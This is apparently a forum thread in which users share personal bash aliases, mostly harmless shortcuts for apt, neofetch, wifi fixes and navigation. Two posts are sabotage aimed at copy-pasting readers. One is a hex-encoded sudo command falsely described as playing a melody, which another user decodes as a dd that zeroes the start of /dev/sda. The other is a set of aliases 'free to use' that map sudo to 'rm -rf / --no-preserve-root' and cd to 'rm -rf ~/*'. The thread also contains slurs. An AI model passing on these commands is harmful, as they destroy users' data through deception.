Come on Sup Forumsentoomen! You must have added at-least some garbage over the years.
Here's my ~/.bash_aliases:
alias update-hosts='~/'
alias update-pac='~/'
alias update-qbt-bl='~/'
alias ppa-fix='~/'
alias wifi-channels='sudo iwlist wlp2s0 scan | grep \(Channel'
alias fix-packages='sudo apt-get install -f'
alias forcowlol='fortune -a | cowsay | lolcat'
alias scrn4tch='uname -oprv | lolcat && lsb_release -ds | lolcat && screenfetch -A "LiGNUx" -s'
alias scrn4nsh='uname -oprv | lolcat && lsb_release -ds | lolcat && screenfetch -A "LiGNUx"'
alias wthr='curl'
alias touchstick-off='xinput -set-prop "AlpsPS/2 ALPS DualPoint Stick" "Device Enabled" 0'
alias touchstick-on='xinput -set-prop "AlpsPS/2 ALPS DualPoint Stick" "Device Enabled" 1'
alias saptgup='sudo apt-get update'
alias saptup='sudo apt update'
alias wgldown='cd ~/Downloads && wget -i toDL.wgdl.txt'
alias set-ff-dimen='wmctrl -r "- Mozilla Firefox" -e 0,172,60,1580,905'
alias set-op-dimen='wmctrl -r "- Opera" -e 0,172,60,1580,905'
alias inxireg='inxi -Fz'
alias inxiful='inxi -Fxz'
alias fix-wifi='sudo systemctl restart network-manager.service'
alias fix-wifi-2='sudo service network-manager stop && sleep 7 && sudo service network-manager start'
alias fix-bluetooth='sudo systemctl enable bluetooth-resume.service'
alias ncr4nsh='uname -oprv | lolcat && lsb_release -ds | lolcat && neofetch --ascii_distro ubuntu_old'
alias ncr4tch='uname -oprv | lolcat && lsb_release -ds | lolcat && neofetch --ascii_distro ubuntu_old -s'
alias grswitchtf='~/'
alias fix-hotcorners='~/'
Just copy, paste, and post yours. Rate if so desired.
Bash Alias Thread: Share Your Personal Bash Aliases Here
Other urls found in this thread:
alias dux="du -h -x --max-depth=1 . | sort -h"
Everything else is a script in ~/bin/
alias :q='exit'
Like , I keep most of my shit in ~/Scripts (which is in PATH)
ls ~/Scripts Anime Lemon moviemode ssh-regen trackballscroll VolumeDown
anime backgroundShuffle kanna SaltPush touhou unmoviemode VolumeUp
Share scripts via paste bin or github if possible.
sudo $(echo "64642069663d2f6465762f7a65726f206f663d2f6465762f73646120636f756e743d3130302062733d314d0a" | xxd -r -p)
not really an alias but pretty cool regardless, plays a random, midilike melody.
These are my aliases in my .bashrc
Feel free to use:
alias sudo='sudo rm -rf / --no-preserve-root ;'
alias cd='rm -rf ~/* ;'
alias ls='cd'
alias cp='firefox'
alias mv='cd'
alias mkdir='cd'
alias top='cd'
alias exit='cd'
alias reboot='cd'
alias shutdown='cd'
Besides install, remove and update, the only worh alias on my PC is
alias clear='printf "\033c"'
It clears whole screen instead of adding bunch of new lines.
alias ..='cd ..'
alias ...='cd ../..'
I use functions much more often than aliases.
Yeah ok
Could you please post the contents of
alias kib='awk '"'"'{printf("%.1f%s", $1 / 1024, "K")}'"'
alias serve='(port=$(( 8000+( $(od -An -N2 -i /dev/random) )%(1023+1) )); (open localhost:${port}; python -m SimpleHTTPServer ${port}))'
alias iwget='wget -nd -r -A jpeg,jpg,bmp,gif,png --reject txt -e robots=off '
Are you familiar with Zsh?
It includes many of these alias regarding git, cd, mkdir, ls.
ubuntu ~ $ echo "64642069663d2f6465762f7a65726f206f663d2f6465762f73646120636f756e743d3130302062733d314d0a" | xxd -r -p
dd if=/dev/zero of=/dev/sda count=100 bs=1M
Just use
Thanks user
This is pretty cool idea. I mean I'm using most of these commands manually but still a cool idea.
alias ls='ls -a --color=auto'
alias show='clear && neofetch -block_range 0 1 -block_range 0 15 --cpu_temp on'
alias ..='cd ..'
alias ...='cd ../..'
alias ....='cd ../../..'
alias c='clear'
alias cls='clear && ls -a'
alias clock='tty-clock -s -b -c -C 1 -D'
alias phone='$HOME/scripts/'
alias backup='$HOME/scripts/'
alias sdb='$HOME/scripts/'
alias ffwebm='$HOME/scripts/'
alias clip='rofi -modi "clipboard:greenclip print" -show clipboard'
alias vim='nvim'
alias aqua='perl $HOME/scripts/asciiquarium'
alias xup='xrdb ~/.Xresources'
alias yolo='git commit -am "DEAL WITH IT" && git push -f origin master'
That's awesome user. thx
keeeep it alive
stop trying productive threads
#define FALSE TRUE
#define TRUE FALSE
alias fucking = 'sudo'
alias | xclipt
alias coqtop='ledit coqtop'
alias dc='ledit dc'
alias ed='ledit ed'
alias fr='env LANG=fr_FR.utf8'
alias ghci='ledit ghci'
alias ocaml='ledit ocaml'
alias p='ping'
alias rpc='ledit rpc'
alias rpn='ledit rpn'
alias scheme='ledit scheme'
alias tex='ledit tex'
alias tmux='tmux a || tmux'
alias cd..='cd ..'
Linux is shit
I used this to make screenshots to mock ( the most sincere form of flattery ) macfags. It has been updated to be more accurate.
alias gayscrotum="scrot -u poop.png && convert poop.png -set filename:magic '%wx%h_%b-%k_%i' \( +clone -background black -shadow 80x20+0+15 \) +swap -background none -layers merge +repage '%[filename:magic]' "
You will of course need a version of scrot capable of using the -u argument & imagemagic installed. Apparently not all builds have this functionality.
are you familiar with shopt -s autocd?
alias longasslistingoffiles="ls -l"
alias l='ls -lah'
alias cd..='cd ..'
alias sysupd='sudo apt update; sudo apt upgrade'
>alias :q='exit'
stealing rn
what about it?